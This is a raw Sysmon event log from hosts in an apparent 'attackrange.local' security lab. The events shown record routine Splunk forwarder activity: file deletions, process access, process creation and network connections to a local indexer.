16:30:25.899{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2309DB6C90F2925740B55A8A6B14BEC2,SHA256=843D965557475C6E6444842E57199806B1B86874947983BEA0D7A01A34F98757,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061354Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.899{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5221-6063-2D01-00000000AF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061353Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.899{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061352Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.899{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061351Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.899{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061350Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.899{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061349Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.899{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-5221-6063-2D01-00000000AF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061348Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.899{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5221-6063-2D01-00000000AF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061347Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.900{7F8C56E7-5221-6063-2D01-00000000AF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061346Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.336{7F8C56E7-5221-6063-2C01-00000000AF01}4212960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061345Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.211{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5221-6063-2C01-00000000AF01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061344Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.211{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061343Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.211{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061342Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.211{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061341Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.211{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061340Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.211{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5221-6063-2C01-00000000AF01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061339Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.211{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5221-6063-2C01-00000000AF01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061338Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:25.212{7F8C56E7-5221-6063-2C01-00000000AF01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000246079Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.468{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64792-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246078Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:25.332{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E53432D15122335CF94ADE0B0C325D8,SHA256=3D8AC4D17A76C2482FF910030B591B573E6855789B4FE814FE92473C86D40754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061356Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:26.586{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=634A8CF494E996D250885AC1036059DC,SHA256=B37E6256D3237F5F39A772BFCFE1519CF03E13552C488E0F4ABEC73C2D424669,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246081Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:26.551{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C37476860D406A31AE3151A420D19A,SHA256=C9DA7EF9B090BEEC73D1EA54135BF5A494D656846849A05B2F92DB11146952B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246080Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:26.004{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C9FAD76EF112DCB86A3D3B146F1BD96,SHA256=AD3C1277EBDBDF48B8E28CA383A79208B89590E84DC4CDEC81023A69419B36BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061357Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:27.946{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AEC9C7EB1E36409442022A3C4C36310,SHA256=07BC656519FAC940F53CC134C5B398EF66C7324FF40E81467F5FECBE251688D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246082Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:27.551{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9A53672FD6DCFC58180FC3BE6057E68,SHA256=441C3A47989F51D7C681FAD25999FF3711AA606BA035FC555B325E2D69882591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246083Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:28.613{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED473248AF82CABC1DA4DAC7846490A4,SHA256=998D3282EDECF906DAAD7BBCB5ADD19B442ED3B0083756E89305AD9A1D0BA8DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061358Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:29.352{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63CBE285BD27A34C67BD9BD1F43CA172,SHA256=0C0A721F3503E7AB66F56638CC3C74C1A28975A82ED95FB585617D06540F967E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246084Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:29.613{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D70A7FF52EE90D2C705A4C872D9750,SHA256=EC796CB3B103F197E191AF1CE39C4E6B0A38689B87EBE8DB883A92D6D9409532,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061360Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:30.712{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8883FDD180BDB406292F98D132472D3,SHA256=DFEEA7C2CDC4A9F139A3A7F8B4B01568601F0183A1143C5D4B0606E6D6E0AEDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061359Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:27.018{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54823-false10.0.1.12-8000- 23542300x8000000000000000246086Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:30.613{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFDC60C2FB418075DE0077270E083D68,SHA256=4F8F93B54D4485BB459A59AD0672C5A5BBDB24E1A5C0E10B18630F1D3AA9A780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246085Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:30.051{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAA627207592939FF7FD47D74F112A37,SHA256=45DD94C5D4416F9083572436F0A1B0A62D3AABA2C9A80789CB566F9E38FF6A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061361Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:31.399{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F521FF58E103ADC3D74ACEAA530170E,SHA256=72D2F0F35D2D04EA410F7A32F7BED5D69C92E15EEF7AF42A38501110463432FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246088Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:31.629{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5BFA907047AA1E738656651679CE2CA,SHA256=2B70543B13677453DFFC5E88501D925573A0F12A5D09D7F5A39550996A4E3FDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246087Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:29.483{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64793-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061362Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:32.071{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653436311CE7A28C22ED04C17F94E546,SHA256=62BB0BB3968B280AF87DAEDAE438263386B11580978B694A73411BFBC6A6223B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246089Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:32.629{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2438B8C99144FD3278EC8635E85CEAEA,SHA256=0AE190A7E3B8979CB2DFC602F195C78EA13D345C00A95CEA09FCB209D3B358FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061363Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:33.446{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B72170EB4E10605621D54660176795B7,SHA256=E2B1F75F6C7429C2212F1865262647CA52680E42567C7847AE972506AA58985A,IMPHASH=00000000000000000000000000000000falsetrue 